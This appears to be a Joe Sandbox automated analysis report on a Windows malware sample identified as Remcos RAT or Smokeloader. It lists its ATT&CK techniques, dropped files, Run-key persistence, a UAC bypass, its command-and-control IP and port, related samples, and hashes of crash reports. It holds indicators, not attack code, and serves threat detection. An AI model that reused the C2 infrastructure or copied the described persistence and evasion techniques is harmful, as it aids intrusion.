Source: Yara match | File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: cmd.exe, 0_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: cmd.exe, 17_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: cmd.exe, 20_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: cmd.exe, 38_2_00405042
ATT&CK matrix, grouped by tactic. A number in front of a technique is the count of report signatures mapped to it; techniques listed without a number are matrix entries with no match for this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 12 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Windows Service; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 22 Process Injection; 11 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 22 Process Injection; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 23 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1588844 | Sample: yPIOW6yoPi.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100

Graph nodes (node id in parentheses; bracketed numbers are the counts shown beside the process node in the graph):

Start node (2):
  DNS: geoplugin.net (57)
  Signatures: Suricata IDS alerts for network traffic (67); Found malware configuration (69); Malicious sample detected (through community Yara rule) (71); 8 other signatures (73)
  Started processes: yPIOW6yoPi.exe [1 4] (8); yavascript.exe (12); yavascript.exe (14)

Process yPIOW6yoPi.exe (8):
  Dropped files: C:\Users\user\AppData\...\yavascript.exe, PE32 (49); C:\Users\...\yavascript.exe:Zone.Identifier, ASCII (51)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA) (75); Detected unpacking (changes PE section rights) (77); Detected Remcos RAT (79); 6 other signatures (81)
  Started processes: yavascript.exe (16); WerFault.exe [16] (20); WerFault.exe [16] (23); 6 other processes (27)

Process yavascript.exe (12):
  Started processes: WerFault.exe (25)

Process yavascript.exe (16):
  Network: 198.23.227.212, 32583, 49753 AS-COLOCROSSINGUS United States (53); geoplugin.net 178.237.33.50, 49828, 80 ATOM86-ASATOM86NL Netherlands (55)
  Signatures: Multi AV Scanner detection for dropped file (59); Contains functionality to bypass UAC (CMSTPLUA) (61); Detected unpacking (changes PE section rights) (63); 5 other signatures (65)
  Started processes: WerFault.exe (29); WerFault.exe (31); WerFault.exe (33); 3 other processes (35)

Process WerFault.exe (20):
  Dropped files: C:\ProgramData\Microsoft\...\Report.wer, Unicode (37)

Process WerFault.exe (23):
  Dropped files: C:\ProgramData\Microsoft\...\Report.wer, Unicode (39)

6 other processes (27):
  Dropped files: C:\ProgramData\Microsoft\...\Report.wer, Unicode (41); C:\ProgramData\Microsoft\...\Report.wer, Unicode (43); C:\ProgramData\Microsoft\...\Report.wer, Unicode (45); 3 other malicious files (47)

Source | Detection | Scanner | Label
yPIOW6yoPi.exe | 71% | ReversingLabs | Win32.Trojan.Smokeloader
yPIOW6yoPi.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
yPIOW6yoPi.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\xenor\yavascript.exe | 71% | ReversingLabs | Win32.Trojan.Smokeloader

No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp4 | yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.4.dr | false | | high
http://geoplugin.net/json.gp/C | yPIOW6yoPi.exe, 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yPIOW6yoPi.exe, 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, yPIOW6yoPi.exe, 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpl | yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpk | yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpSystem32 | yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp. | yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
198.23.227.212 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1588844
                              Start date and time:2025-01-11 06:11:42 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 11m 5s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 40
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:yPIOW6yoPi.exe
                              renamed because original name is a hash value
                              Original Sample Name:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347.exe
                              Detection:MAL
                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@20/64@1/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 33
                              • Number of non-executed functions: 381
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.182.143.212, 13.107.246.45, 20.190.159.71, 4.175.87.197, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: yPIOW6yoPi.exe
                              Time | Type | Description
                              00:12:51 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
                              00:13:26 | API Interceptor | 4303399x Sleep call for process: yavascript.exe modified
                              06:12:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                              06:12:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              198.23.227.212 | requests-pdf.exe | Get hash | malicious | Remcos | Browse
                              | E84Ddy7gSh.exe | Get hash | malicious | Remcos | Browse
                              | advancePayment-pdf.exe | Get hash | malicious | Remcos | Browse
                              | YESOHDKMIm.exe | Get hash | malicious | Remcos | Browse
                              | NujUXO42Rg.exe | Get hash | malicious | Remcos | Browse
                              | ZeaS4nUxg4.exe | Get hash | malicious | Remcos | Browse
                              | documents-pdf.exe | Get hash | malicious | Remcos | Browse
                              | 1kZ9olJiaG.exe | Get hash | malicious | Remcos | Browse
                              | ltlbVjClX9.exe | Get hash | malicious | Remcos | Browse
                              178.237.33.50 | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • geoplugin.net/json.gp
                              | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • geoplugin.net/json.gp
                              | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse
                              • geoplugin.net/json.gp
                              | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | 1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              | 1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • geoplugin.net/json.gp
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              geoplugin.net | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • 178.237.33.50
                              | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • 178.237.33.50
                              | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse
                              • 178.237.33.50
                              | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              AS-COLOCROSSINGUS | C2R7VV2QmG.exe | Get hash | malicious | Remcos | Browse
                              • 192.210.150.26
                              | 8kjlHXmbAY.exe | Get hash | malicious | Remcos | Browse
                              • 192.210.150.26
                              | OKkUGRkZV7.exe | Get hash | malicious | Remcos | Browse
                              • 192.3.64.152
                              | NssBkEQKsI.exe | Get hash | malicious | Remcos | Browse
                              • 192.210.150.26
                              | l1QC9H0SNR.exe | Get hash | malicious | Remcos | Browse
                              • 192.210.150.26
                              | MLxloAVuCZ.exe | Get hash | malicious | Remcos | Browse
                              • 192.3.64.152
                              | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse
                              • 192.210.150.26
                              | Nuevo-orden.xla.xlsx | Get hash | malicious | Unknown | Browse
                              • 192.3.27.144
                              | Nuevo-orden.xla.xlsx | Get hash | malicious | Unknown | Browse
                              • 192.3.27.144
                              | Nuevo-orden.xla.xlsx | Get hash | malicious | Unknown | Browse
                              • 192.3.27.144
                              ATOM86-ASATOM86NL | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • 178.237.33.50
                              | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse
                              • 178.237.33.50
                              | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse
                              • 178.237.33.50
                              | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                              | 1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe | Get hash | malicious | Remcos | Browse
                              • 178.237.33.50
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.008457597434543
                                                Encrypted:false
                                                SSDEEP:384:OCCIH9dwyKcxwy4Jtj+zuiFrY4IO8GuT:O2TxwyCj+zuiFrY4IO8
                                                MD5:C9C8D7DE0957B36A0919ABF8572A8164
                                                SHA1:789870ECD86D3FE7D27502E17B24A86E810BADA4
                                                SHA-256:25BC548AAF389CDE82EC077942F3DA39300CBB11CE44420BCE50C89EAD8C9C3B
                                                SHA-512:42A93737F624B86E3A0E6FFBC82C5AE460305F47516C3FB2EF5F73CDF2A9719E93C07E4FFCFBAEB250FD44709F804D07AB22F946559ED2D0EE7AEE4D40FE1F8A
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.7.2.9.5.6.4.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.8.0.3.0.0.0.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.2.f.c.4.8.c.-.3.e.e.1.-.4.a.e.6.-.9.3.0.c.-.4.6.4.5.0.d.7.d.3.5.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.0.d.4.b.5.e.-.d.1.a.a.-.4.7.1.8.-.8.0.8.b.-.9.6.2.d.3.8.2.9.2.c.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9378506197517005
                                                Encrypted:false
                                                SSDEEP:192:qpYdIHpzpzDypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:qCIH9dDyn56reJtjKzuiFrY4IO8buT
                                                MD5:DB03EBF63C7A17174983306F0BF22BE5
                                                SHA1:9625BB1AE71D56FE2A0FCD5372347D2356A5F8C8
                                                SHA-256:1D1786B1D221FB282E523066F8E90D99B21D916DEFEE42A4C06129B69BD717C6
                                                SHA-512:B6C3FA8D26F612E208E11DAB22F454026342470507575834B46C22539537DC2920238EAB0EBB5A415F4E35A59CA68B9EFA75CB116F089E708A2790D16F6E94B0
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.2.6.3.4.7.5.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.9.b.d.a.8.2.-.6.7.2.6.-.4.b.e.d.-.b.a.5.4.-.b.8.0.2.5.f.3.f.7.4.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.3.d.c.1.8.5.-.0.f.a.f.-.4.2.b.2.-.9.c.1.5.-.8.1.e.8.7.2.6.0.3.7.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9375026489286793
                                                Encrypted:false
                                                SSDEEP:192:uvpYdIHpzpzurypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:4CIH9duryn56reJtjKzuiFrY4IO8buT
                                                MD5:A7026CFEC52F9CC4EA9F7C9B9E8BDA2F
                                                SHA1:097301A476BF029137A4FF3F76F712BB08B6739E
                                                SHA-256:A27DC6008D69687CB7BF5BBE8F84D44D7B172F3A652D887F0F69505F04670AE6
                                                SHA-512:82C89EC956AA6B17C50BCF4498C7C9B8C3BBCC8EF295CAECF541D1E638B02D7BECB92DA351E63F96B4795A0D220A1F7168DA60766D2802EC6B9CD1D3412E757B
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.5.6.7.1.7.8.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.4.5.2.7.7.a.-.e.9.b.d.-.4.6.c.5.-.b.c.6.a.-.b.5.8.1.7.4.2.e.3.b.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.5.e.a.e.7.7.-.1.0.3.f.-.4.a.a.c.-.b.e.1.3.-.3.2.d.f.e.4.6.0.f.0.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9375582905119481
                                                Encrypted:false
                                                SSDEEP:192:wUpYdIHpzpzIypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:pCIH9dIyn56reJtjKzuiFrY4IO8buT
                                                MD5:8C1A502C47B0216D2302BCB267AB78F6
                                                SHA1:8BB7E37B5D82C5D5E2A95918BC572297A8F634F8
                                                SHA-256:55B4AE0F8542AF9DCB1F9B6BB81011E36F65DBD4B95E8F47F25134E28AFDF97B
                                                SHA-512:1F2F4D0D152FA7A4838926A4FBD5CF5FBFDB8F50B2293EBEF5C8CFFF4EC314ACE99753410D8ED9836059BCF59860E8244D93A4F85E1A3236794504C7FDAE33EC
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.3.4.8.3.2.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.c.6.7.f.1.0.-.0.9.d.1.-.4.f.5.e.-.b.b.0.2.-.5.8.9.7.b.4.2.9.d.b.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.9.d.5.5.d.c.-.d.6.9.d.-.4.a.5.0.-.9.f.a.2.-.7.a.4.c.f.9.6.6.f.1.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
